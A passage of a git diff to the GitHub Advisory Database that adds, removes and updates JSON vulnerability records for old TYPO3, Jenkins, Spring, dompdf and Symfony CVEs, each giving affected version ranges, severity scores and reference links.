"2022-04-21T01:57:47Z", + "aliases": [ + "CVE-2010-3666" + ], + "summary": "TYPO3 is vulnerable to Insecure randomness in uniqid function", + "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 contains insecure randomness in the `uniqid` function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.1.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3666" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/302b35e714ca30ddb71ab36b9cbb2bea760a2f0e" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/352d6066bf09137e86705bc060fd4ab3ba8f9191" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/42324b30546b1e49fb16c916fc71cceb99ad9fd0" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/f6d2e33cfab87c9e44eca275d6755be747e3cd7e" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/install" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3666" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Insecure_Randomness" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-330" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T23:21:45Z", + "nvd_published_at": "2019-11-04T22:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-cg45-qgcf-hf9x/GHSA-cg45-qgcf-hf9x.json b/advisories/github-reviewed/2022/04/GHSA-cg45-qgcf-hf9x/GHSA-cg45-qgcf-hf9x.json new file mode 100644 index 0000000000000..6f2790a42f241 --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-cg45-qgcf-hf9x/GHSA-cg45-qgcf-hf9x.json @@ -0,0 +1,126 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cg45-qgcf-hf9x", + "modified": "2024-02-06T22:58:29Z", + "published": "2022-04-21T01:57:46Z", + "aliases": [ + "CVE-2010-3660" + ], + "summary": "TYPO3 is vulnerable to Cross-Site Scripting (XSS) on the backend", + "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows XSS on the backend.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.1.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3660" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3660" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#XSS" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T22:58:29Z", + "nvd_published_at": "2019-11-01T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-g5mm-vmx4-3rg7/GHSA-g5mm-vmx4-3rg7.json b/advisories/github-reviewed/2022/04/GHSA-g5mm-vmx4-3rg7/GHSA-g5mm-vmx4-3rg7.json index f80a268299587..53ff3cfebced2 100644 --- a/advisories/github-reviewed/2022/04/GHSA-g5mm-vmx4-3rg7/GHSA-g5mm-vmx4-3rg7.json +++ b/advisories/github-reviewed/2022/04/GHSA-g5mm-vmx4-3rg7/GHSA-g5mm-vmx4-3rg7.json @@ -18,7 +18,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-context" }, "ranges": [ { @@ -37,7 +37,7 @@ { "package": { "ecosystem": "Maven", - "name": "org.springframework:spring-core" + "name": "org.springframework:spring-context" }, "ranges": [ { diff --git a/advisories/github-reviewed/2022/04/GHSA-gqmh-5xmq-3fhg/GHSA-gqmh-5xmq-3fhg.json b/advisories/github-reviewed/2022/04/GHSA-gqmh-5xmq-3fhg/GHSA-gqmh-5xmq-3fhg.json new file mode 100644 index 0000000000000..5ffe039198086 --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-gqmh-5xmq-3fhg/GHSA-gqmh-5xmq-3fhg.json @@ -0,0 +1,142 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gqmh-5xmq-3fhg", + "modified": "2024-02-07T21:28:51Z", + "published": "2022-04-21T01:57:47Z", + "aliases": [ + "CVE-2010-3671" + ], + "summary": "TYPO3 is vulnerable to Session Fixation", + "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 is open to a session fixation attack which allows remote attackers to hijack a victim's session.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.1.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3671" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/199cc2d53747d76657d7aab612c6b3f728d0f15d" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/1d649976e1f1bda684cdc7120e9f74a543059181" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/d3577c8e2c49122c4ab5955c70688ee441d06f23" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/ef3676281b0346644041a93fcbaa7bd9844bbbc5" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/install" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3671" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Broken_Authentication_and_Session_Management" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-384" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T21:28:51Z", + "nvd_published_at": "2019-11-05T20:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-j628-384g-rmgc/GHSA-j628-384g-rmgc.json b/advisories/github-reviewed/2022/04/GHSA-j628-384g-rmgc/GHSA-j628-384g-rmgc.json new file mode 100644 index 0000000000000..cb2e46b9e4be0 --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-j628-384g-rmgc/GHSA-j628-384g-rmgc.json @@ -0,0 +1,126 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j628-384g-rmgc", + "modified": "2024-02-06T23:03:14Z", + "published": "2022-04-21T01:57:46Z", + "aliases": [ + "CVE-2010-3661" + ], + "summary": "TYPO3 Open Redirection vulnerability on the backend", + "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows Open Redirection on the backend.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.1.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3661" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3661" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Open_Redirection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T23:03:14Z", + "nvd_published_at": "2019-11-01T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-m6ch-gg5f-wxx3/GHSA-m6ch-gg5f-wxx3.json b/advisories/github-reviewed/2022/04/GHSA-m6ch-gg5f-wxx3/GHSA-m6ch-gg5f-wxx3.json deleted file mode 100644 index f4a860ef80ea0..0000000000000 --- a/advisories/github-reviewed/2022/04/GHSA-m6ch-gg5f-wxx3/GHSA-m6ch-gg5f-wxx3.json +++ /dev/null @@ -1,342 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-m6ch-gg5f-wxx3", - "modified": "2022-04-07T13:59:22Z", - "published": "2022-04-07T13:59:22Z", - "aliases": [ - "CVE-2016-5385" - ], - "summary": "HTTP Proxy header vulnerability", - "details": "PHP through 7.0.8 does not attempt to address RFC 3875 section 4.1.18 namespace conflicts and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, as demonstrated by (1) an application that makes a getenv('HTTP_PROXY') call or (2) a CGI configuration of PHP, aka an \"httpoxy\" issue.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" - } - ], - "affected": [ - { - "package": { - "ecosystem": "Packagist", - "name": "guzzlehttp/guzzle" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "6" - }, - { - "fixed": "6.2.1" - } - ] - } - ] - }, - { - "package": { - "ecosystem": "Packagist", - "name": "guzzlehttp/guzzle" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "4.0.0-rc2" - }, - { - "fixed": "4.2.4" - } - ] - } - ] - }, - { - "package": { - "ecosystem": "Packagist", - "name": "guzzlehttp/guzzle" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "5" - }, - { - "fixed": "5.3.1" - } - ] - } - ] - }, - { - "package": { - "ecosystem": "Packagist", - "name": "drupal/core" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "8.0" - }, - { - "fixed": "8.1.7" - } - ] - } - ] - }, - { - "package": { - "ecosystem": "Packagist", - "name": "bugsnag/bugsnag-laravel" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "2.0.2" - } - ] - } - ] - }, - { - "package": { - "ecosystem": "Packagist", - "name": "amphp/artax" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "1.0.4" - } - ] - } - ] - }, - { - "package": { - "ecosystem": "Packagist", - "name": "amphp/artax" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "2.0.0" - }, - { - "fixed": "2.0.4" - } - ] - } - ] - }, - { - "package": { - "ecosystem": "Packagist", - "name": "padraic/humbug_get_contents" - }, - "ranges": [ - { - "type": "ECOSYSTEM", - "events": [ - { - "introduced": "0" - }, - { - "fixed": "1.1.2" - } - ] - } - ] - } - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-5385" - }, - { - "type": "WEB", - "url": "https://github.com/bugsnag/bugsnag-laravel/pull/143" - }, - { - "type": "WEB", - "url": "https://github.com/bugsnag/bugsnag-laravel/pull/145" - }, - { - "type": "WEB", - "url": "https://github.com/humbug/file_get_contents/pull/23" - }, - { - "type": "WEB", - "url": "https://github.com/humbug/file_get_contents/pull/23/commits/848e8c282a863654e76bd958acfb57c81cb739b5" - }, - { - "type": "WEB", - "url": "https://github.com/amphp/artax/commit/81254742812a5a9adf4b085f543f3f21daedcd97" - }, - { - "type": "WEB", - "url": "https://github.com/amphp/artax/commit/b60cf493c9e577a3678865f620b1eb61ab3d7ca9" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1353794" - }, - { - "type": "WEB", - "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/guzzlehttp/guzzle/CVE-2016-5385.yaml" - }, - { - "type": "WEB", - "url": "https://github.com/bugsnag/bugsnag-laravel/releases/tag/v2.0.2" - }, - { - "type": "WEB", - "url": "https://github.com/guzzle/guzzle/blob/4.x/CHANGELOG.md#424-2016-07-18" - }, - { - "type": "WEB", - "url": "https://github.com/guzzle/guzzle/blob/5.3/CHANGELOG.md#531---2016-07-18" - }, - { - "type": "WEB", - "url": "https://github.com/guzzle/guzzle/blob/master/CHANGELOG.md#622---2016-10-08" - }, - { - "type": "WEB", - "url": "https://github.com/guzzle/guzzle/releases/tag/6.2.1" - }, - { - "type": "WEB", - "url": "https://github.com/humbug/file_get_contents/releases/tag/1.1.2" - }, - { - "type": "WEB", - "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03770en_us" - }, - { - "type": "WEB", - "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05320149" - }, - { - "type": "WEB", - "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05333297" - }, - { - "type": "WEB", - "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c05390722" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7RMYXAVNYL2MOBJTFATE73TOVOEZYC5R/" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GXFEIMZPSVGZQQAYIQ7U7DFVX3IBSDLF/" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KZOIUYZDBWNDDHC6XTOLZYRMRXZWTJCP/" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7RMYXAVNYL2MOBJTFATE73TOVOEZYC5R/" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GXFEIMZPSVGZQQAYIQ7U7DFVX3IBSDLF/" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KZOIUYZDBWNDDHC6XTOLZYRMRXZWTJCP/" - }, - { - "type": "WEB", - "url": "https://security.gentoo.org/glsa/201611-22" - }, - { - "type": "WEB", - "url": "https://www.drupal.org/SA-CORE-2016-003" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-updates/2016-08/msg00003.html" - }, - { - "type": "WEB", - "url": "http://rhn.redhat.com/errata/RHSA-2016-1609.html" - }, - { - "type": "WEB", - "url": "http://rhn.redhat.com/errata/RHSA-2016-1610.html" - }, - { - "type": "WEB", - "url": "http://rhn.redhat.com/errata/RHSA-2016-1611.html" - }, - { - "type": "WEB", - "url": "http://rhn.redhat.com/errata/RHSA-2016-1612.html" - }, - { - "type": "WEB", - "url": "http://rhn.redhat.com/errata/RHSA-2016-1613.html" - }, - { - "type": "WEB", - "url": "http://www.debian.org/security/2016/dsa-3631" - }, - { - "type": "WEB", - "url": "http://www.kb.cert.org/vuls/id/797896" - }, - { - "type": "WEB", - "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" - }, - { - "type": "WEB", - "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" - }, - { - "type": "WEB", - "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjul2016-3090544.html" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/91821" - }, - { - "type": "WEB", - "url": "http://www.securitytracker.com/id/1036335" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-601" - ], - "severity": "HIGH", - "github_reviewed": true, - "github_reviewed_at": "2022-04-07T13:59:22Z", - "nvd_published_at": "2016-07-19T02:00:00Z" - } -} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-p78x-93mq-qwqh/GHSA-p78x-93mq-qwqh.json b/advisories/github-reviewed/2022/04/GHSA-p78x-93mq-qwqh/GHSA-p78x-93mq-qwqh.json new file mode 100644 index 0000000000000..24429beac4e23 --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-p78x-93mq-qwqh/GHSA-p78x-93mq-qwqh.json @@ -0,0 +1,100 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p78x-93mq-qwqh", + "modified": "2024-02-06T20:56:16Z", + "published": "2022-04-21T01:57:48Z", + "aliases": [ + "CVE-2010-3672" + ], + "summary": "TYPO3 vulnerable to Cross-Site Scripting in the textarea view helper ", + "details": "TYPO3 before 4.3.4 and 4.4.x before 4.4.1 allows XSS in the textarea view helper in an extbase extension.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-fluid" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-fluid" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3672" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/5f13c2276c8b753ceb76b31d1034a47c781d302a" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/fc2b43503d871b42c0e0094ea55756c089b536ea" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/core" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3-CMS/fluid/blob/cbce111326850c247729f097b2d1fb735e513906/Classes/ViewHelpers/Form/TextareaViewHelper.php" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3672" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#XSS" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T20:56:16Z", + "nvd_published_at": "2019-11-05T20:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-pchp-c5w8-47gc/GHSA-pchp-c5w8-47gc.json b/advisories/github-reviewed/2022/04/GHSA-pchp-c5w8-47gc/GHSA-pchp-c5w8-47gc.json new file mode 100644 index 0000000000000..bbb6d7046e2c8 --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-pchp-c5w8-47gc/GHSA-pchp-c5w8-47gc.json @@ -0,0 +1,92 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pchp-c5w8-47gc", + "modified": "2024-01-30T21:09:35Z", + "published": "2022-04-23T00:40:48Z", + "aliases": [ + "CVE-2012-0785" + ], + "summary": "Hash collision attack vulnerability in Jenkins", + "details": "Hash collision attack vulnerability in Jenkins before 1.447, Jenkins LTS before 1.424.2, and Jenkins Enterprise by CloudBees 1.424.x before 1.424.2.1 and 1.400.x before 1.400.0.11 could allow remote attackers to cause a considerable CPU load, aka \"the Hash DoS attack.\"", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.425" + }, + { + "fixed": "1.447" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.main:jenkins-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.424.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-0785" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/cve-2012-0785" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2012-01-12/" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2012-0785" + }, + { + "type": "WEB", + "url": "https://www.cloudbees.com/jenkins-security-advisory-2012-01-12" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2012/01/20/8" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:09:35Z", + "nvd_published_at": "2020-02-24T17:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-wjpc-gjf7-9938/GHSA-wjpc-gjf7-9938.json b/advisories/github-reviewed/2022/04/GHSA-wjpc-gjf7-9938/GHSA-wjpc-gjf7-9938.json new file mode 100644 index 0000000000000..6f3eab8f6fe0c --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-wjpc-gjf7-9938/GHSA-wjpc-gjf7-9938.json @@ -0,0 +1,126 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wjpc-gjf7-9938", + "modified": "2024-02-06T23:03:54Z", + "published": "2022-04-21T01:57:46Z", + "aliases": [ + "CVE-2010-3663" + ], + "summary": "TYPO3 Arbitrary Code Execution vulnerability on the backend", + "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 contains an insecure default value of the variable fileDenyPattern which could allow remote attackers to execute arbitrary code on the backend.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.1.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2" + }, + { + "fixed": "4.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3663" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3663" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Arbitrary_Code_Execution" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T23:03:54Z", + "nvd_published_at": "2019-11-04T22:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-x752-qjv4-c4hc/GHSA-x752-qjv4-c4hc.json b/advisories/github-reviewed/2022/04/GHSA-x752-qjv4-c4hc/GHSA-x752-qjv4-c4hc.json index 9695bd0b36d2a..32784155ce541 100644 --- a/advisories/github-reviewed/2022/04/GHSA-x752-qjv4-c4hc/GHSA-x752-qjv4-c4hc.json +++ b/advisories/github-reviewed/2022/04/GHSA-x752-qjv4-c4hc/GHSA-x752-qjv4-c4hc.json @@ -52,6 +52,14 @@ "type": "WEB", "url": "https://github.com/dompdf/dompdf/commit/4c70e1025bcd9b7694b95dd552499bd83cd6141d" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/dompdf/dompdf/CVE-2022-28368.yaml" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-x752-qjv4-c4hc" + }, { "type": "PACKAGE", "url": "https://github.com/dompdf/dompdf" diff --git a/advisories/github-reviewed/2022/05/GHSA-22pv-7v9j-hqxp/GHSA-22pv-7v9j-hqxp.json b/advisories/github-reviewed/2022/05/GHSA-22pv-7v9j-hqxp/GHSA-22pv-7v9j-hqxp.json index fa7b82421fa85..b365b6fd149b0 100644 --- a/advisories/github-reviewed/2022/05/GHSA-22pv-7v9j-hqxp/GHSA-22pv-7v9j-hqxp.json +++ b/advisories/github-reviewed/2022/05/GHSA-22pv-7v9j-hqxp/GHSA-22pv-7v9j-hqxp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-22pv-7v9j-hqxp", - "modified": "2023-08-17T22:51:04Z", + "modified": "2024-02-08T19:46:34Z", "published": "2022-05-05T00:29:17Z", "aliases": [ "CVE-2013-4752" @@ -90,6 +90,82 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/http-foundation" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.0.0" + }, + { + 